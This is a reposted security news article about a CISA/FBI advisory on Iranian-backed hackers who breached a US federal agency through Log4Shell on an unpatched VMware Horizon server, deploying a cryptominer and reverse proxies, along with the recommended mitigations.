US govt: Iranian hackers breached federal agency using Log4Shell exploit

Teilen:

The FBI and CISA revealed in a joint advisory published today that an unnamed Iranian-backed threat group hacked a Federal Civilian Executive Branch (FCEB) organization to deploy XMRig cryptomining malware.

The attackers compromised the federal network after hacking into an unpatched VMware Horizon server using an exploit targeting the Log4Shell (CVE-2021-44228) remote code execution vulnerability.

After deploying the cryptocurrency miner, the Iranian threat actors also set up reverse proxies on compromised servers to maintain persistence within the FCEB agency’s network.

“In the course of incident response activities, CISA determined that cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, moved laterally to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” the joint advisory liest.

The two U.S. federal agencies added that all organizations who haven’t yet patched their VMware systems against Log4Shell should assume that they’ve already been breached and advise them to start hunting for malicious activity within their networks.

CISA warned in June that VMware Horizon and Unified Access Gateway (UAG) servers are still being preyed upon by multiple threat actors, including state-sponsored hacking groups, using Log4Shell exploits.

Log4Shell can be exploited remotely to target vulnerable servers exposed to local or Internet access to move laterally across breached networks to access internal systems that store sensitive data.

Ongoing Log4Shell exploitation by state hackers

After its disclosure in December 2021, multiple threat actors almost immediately began scanning for and exploiting systems left unpatched.

The list of attackers includes state-backed hacking groups from China, Iran, North Korea, and Turkey, as well as access brokers known for their close ties with some ransomware gangs.

CISA also advised organizations with vulnerable VMware servers to assume they were breached and initiate threat-hunting activities.

VMware also urged customers in January to secure their VMware Horizon servers against Log4Shell attack attempts as soon as possible.

Since January, Internet-exposed VMware Horizon servers have been hacked by Chinese-speaking threat actors to deploy Night Sky ransomware, the Lazarus North Korean APT to deploy information stealers, and the Iranian-aligned TunnelVision hacking group to deploy backdoors.

In today’s advisory, CISA and the FBI strongly advised organizations to apply recommended mitigations and defensive measures, including:

  • Updating affected VMware Horizon and unified access gateway (UAG) systems to the latest version.
  • Minimizing your organization’s internet-facing attack surface.
  • Exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in the CSA.
  • Testing your organization’s existing security controls against the ATT&CK techniques described in the advisory.

https://www.bleepingcomputer.com/news/security/us-govt-iranian-hackers-breached-federal-agency-using-log4shell-exploit/

Kommentar verfassen

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert

lade-bild
London, GB
5:05 am, Juli 11, 2025
Wetter-Symbol 17°C
L: 16° | H: 18°
aufgelockerte Bewölkung
Luftfeuchtigkeit: 82 %
Druck: 1021 mb
Wind: 5 mph E
Windböe: 0 mph
UV-Index: 0
Niederschlag: 0 mm
Wolken: 39%
Regen Chance: 0%
Sichtbarkeit: 10 km
Sonnenaufgang: 4:56 am
Sonnenuntergang: 9:15 pm
TäglichStündlich
Tägliche VorhersageStündliche Vorhersage
Today 10:00 pm
Wetter-Symbol
16° | 18°°C 0 mm 0% 8 mph 79 % 1021 mb 0 mm/h
Tomorrow 10:00 pm
Wetter-Symbol
19° | 30°°C 0 mm 0% 10 mph 66 % 1019 mb 0 mm/h
So. Juli 13 10:00 pm
Wetter-Symbol
18° | 30°°C 0 mm 0% 7 mph 71 % 1015 mb 0 mm/h
Mo. Juli 14 10:00 pm
Wetter-Symbol
18° | 28°°C 1 mm 100% 15 mph 84 % 1016 mb 0 mm/h
Di. Juli 15 10:00 pm
Wetter-Symbol
14° | 20°°C 1 mm 100% 14 mph 81 % 1017 mb 0 mm/h
Today 7:00 am
Wetter-Symbol
17° | 18°°C 0 mm 0% 2 mph 79 % 1021 mb 0 mm/h
Today 10:00 am
Wetter-Symbol
23° | 26°°C 0 mm 0% 2 mph 62 % 1021 mb 0 mm/h
Today 1:00 pm
Wetter-Symbol
30° | 30°°C 0 mm 0% 3 mph 32 % 1020 mb 0 mm/h
Today 4:00 pm
Wetter-Symbol
32° | 32°°C 0 mm 0% 4 mph 26 % 1018 mb 0 mm/h
Today 7:00 pm
Wetter-Symbol
30° | 30°°C 0 mm 0% 6 mph 29 % 1017 mb 0 mm/h
Today 10:00 pm
Wetter-Symbol
23° | 23°°C 0 mm 0% 8 mph 49 % 1019 mb 0 mm/h
Tomorrow 1:00 am
Wetter-Symbol
21° | 21°°C 0 mm 0% 5 mph 57 % 1019 mb 0 mm/h
Tomorrow 4:00 am
Wetter-Symbol
19° | 19°°C 0 mm 0% 5 mph 66 % 1018 mb 0 mm/h
Name Preis24H (%)
Bitcoin(BTC)
€99,810.20
5.14%
Ethereum(ETH)
€2,536.74
7.01%
Fesseln(USDT)
€0.85
-0.02%
XRP(XRP)
€2.20
6.42%
Solana(SOL)
€140.94
4.85%
USDC(USDC)
€0.85
0.00%
Dogecoin(DOGE)
€0.169204
9.97%
Shiba Inu(SHIB)
€0.000011
8.48%
Pepe(PEPE)
€0.000011
15.53%
Peanut das Eichhörnchen(PNUT)
€0.248507
22.07%
Nach oben scrollen